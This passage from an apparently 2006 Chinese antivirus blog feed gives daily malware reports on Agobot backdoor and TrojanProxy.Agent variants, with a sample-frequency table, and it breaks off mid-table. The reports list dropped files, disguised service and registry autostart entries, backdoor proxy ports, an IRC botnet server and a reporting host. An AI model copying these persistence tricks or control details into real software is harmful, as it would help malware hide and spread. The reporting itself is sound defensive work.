FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 223px" width="223" /><col style="WIDTH: 313px" width="313" /></colgroup><tbody><tr id="L025D08A0108B2BD5"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L025D08E012E834B8" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">icntrl.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L025D092015453DDB" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor/Agobot</span></span></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 17px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><div><span><span id="L025D09A017A2477E" title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><div>1、大小220K~240K左右，是个高波病毒变种。运行后，建立下面文件：</div><div>%SystemDir%\icntrl.exe</div><div>创建服务：NtDIC，服务描述：Nt network domain internet connectivity checker.</div><div>服务程序指向icntrl.exe。这样病毒可以随Windows系统自动启动。</div><div>&amp;nbsp;</div><div>2、通过多种系统漏洞传播，在传播过程中，会扫描局域网内的计算机，发送大量数据包，造成中毒计算机CPU占用率很高，局域网拥堵。</div><div>&amp;nbsp;</div><div>3、连接IRC服务器frayedendsofsanity.be接收并执行黑客命令。</div><div>&amp;nbsp;</div><div>botnet:</div><div>frayedendsofsanity.be:5599</div><div>##meth metal</div><div>&amp;nbsp;</div></span></span></div></td></tr></tbody></table></span><div></div></span><div></div><span id="L0301A040628A572C" title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 540px" width="540" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 16px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 223px" width="223" /><col style="WIDTH: 313px" width="313" /></colgroup><tbody><tr id="L0301A0C0658BF7EF"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L0301A100688D98F2" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">lup.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L0301A1406B8F3A35" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor/Agobot</span></span></td></tr><tr id="L0301E04076F11521"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L0301E08079F2F5A4" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mssvcc.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L0301E0C07CF4D667" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor/Agobot</span></span></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 17px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><div><span><span id="L0301A1C06E90DBF8" title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><div>这2个是高波的变种，请参考昨日病毒（2006.03.16-03.17）和昨日病毒（3月13日）</div><div>&amp;nbsp;</div></span></span></div></td></tr></tbody></table></span><div></div></span><div></div><span id="L011600407E0AD6AA" title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 540px" width="540" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 16px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 223px" width="223" /><col style="WIDTH: 313px" width="313" /></colgroup><tbody><tr id="L011600C07F20D76D"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L011601008036D870" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mssm32.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L01160140814CD9B3" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanProxy.Agent</span></span></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 17px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><div><span><span id="L011601C08262DB76" title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><div>1、病毒运行后，将创建下列文件：<br />%SystemDir%\mssm32.exe, 21253字节<br />在注册表中添加下列启动项：<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />&amp;quot;Microsoft (R) Windows Security Manager&amp;quot; = %SystemDir%\mssm32.exe<br />这样，在Windows启动时，病毒就可以自动执行。</div><div>&amp;nbsp;</div><div>2、打开后门代理TCP端口24027，可供黑客远程使用，作为跳板，进行黑客行为。</div><div>&amp;nbsp;</div><div>3、感染计算机后，向sophos.inlandloan.com发送UPD包，报告感染信息。</div><div>&amp;nbsp;</div></span></span></div></td></tr></tbody></table></span><div></div></span><div></div><span id="L011644A083792019" title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 540px" width="540" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 16px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 223px" width="223" /><col style="WIDTH: 313px" width="313" /></colgroup><tbody><tr id="L01164BE0848F6BFC"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L0116558085A5C17F" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">wuass32.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L0116516086BC12E2" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanProxy.Agent</span></span></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 17px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><div><span><span id="L0116420087D254E5" title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><div>1、病毒运行后，将创建下列文件：<br />%SystemDir%\wuass32.exe, 21953字节<br />在注册表中添加下列启动项：<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />&amp;quot;Microsoft (R) User Authorization Service&amp;quot; = %SystemDir%\wuass32.exe<br />这样，在Windows启动时，病毒就可以自动执行。</div><div>&amp;nbsp;</div><div>2、打开后门代理TCP端口3557，可供黑客远程使用，作为跳板，进行黑客行为。</div><div>&amp;nbsp;</div></span></span></div></td></tr></tbody></table></span><div></div></span><div></div></span><div></div></td></tr></tbody></table></span>]]></description> 
<dc:subject><![CDATA[病毒反病毒]]></dc:subject> 
<dc:creator><![CDATA[daishuo]]></dc:creator> 
<dc:date>2006-03-26T12:35:39Z</dc:date> 
</item> 
<item rdf:about="http://daishuo.bokee.com/4726128.html"> 
<title><![CDATA[昨日病毒(2006.03.23)]]></title> 
<link>http://daishuo.bokee.com/4726128.html</link> 
<description><![CDATA[<span>&amp;nbsp;<table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 562px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 562px" width="562" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 41px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #99ccff" width="562"><div><strong><font face="Arial">昨日病毒</font></strong></div></td></tr><tr style="MIN-HEIGHT: 31px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 295px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 146px" width="146" /><col style="WIDTH: 149px" width="149" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="146"><div><font face="Arial"><strong>统计时段</strong></font></div></td><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="149"><div><font face="宋体"><div title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline; FONT-SIZE: x-small; MARGIN: 1px 1px 2px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; BACKGROUND-COLOR: window"><span id="L0238050004700606" style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; OVERFLOW: hidden; WIDTH: 100%; MARGIN-RIGHT: 22px; PADDING-TOP: 0px; WHITE-SPACE: nowrap; HEIGHT: 100%">2006-3-23</span><span style="MARGIN-LEFT: -21px; WIDTH: 20px; HEIGHT: 18px"></span></div></font></div></td></tr></tbody></table></span><div></div></td></tr><tr><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 555px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 555px" width="555" /></colgroup><tbody><tr><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><div><strong><font face="Arial">病毒样本上报数排行</font></strong></div><div><strong><font face="Arial"></font></strong>&amp;nbsp;</div><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 394px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 165px" width="165" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 22px"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="229"><div align="center"><font face="Arial">样本文件名</font></div></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="165"><div align="center"><font face="Arial">上报次数</font></div></td></tr></tbody></table></span><div></div></td></tr></tbody><tbody><tr id="L023806C006A80CC9"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L0238074008E0140C" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">newname5.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L023807800B181B8F" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">197</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr><tr id="L023807C00D502352"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L023808400F882B95" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mousepad5.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L0238088011C03418" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; 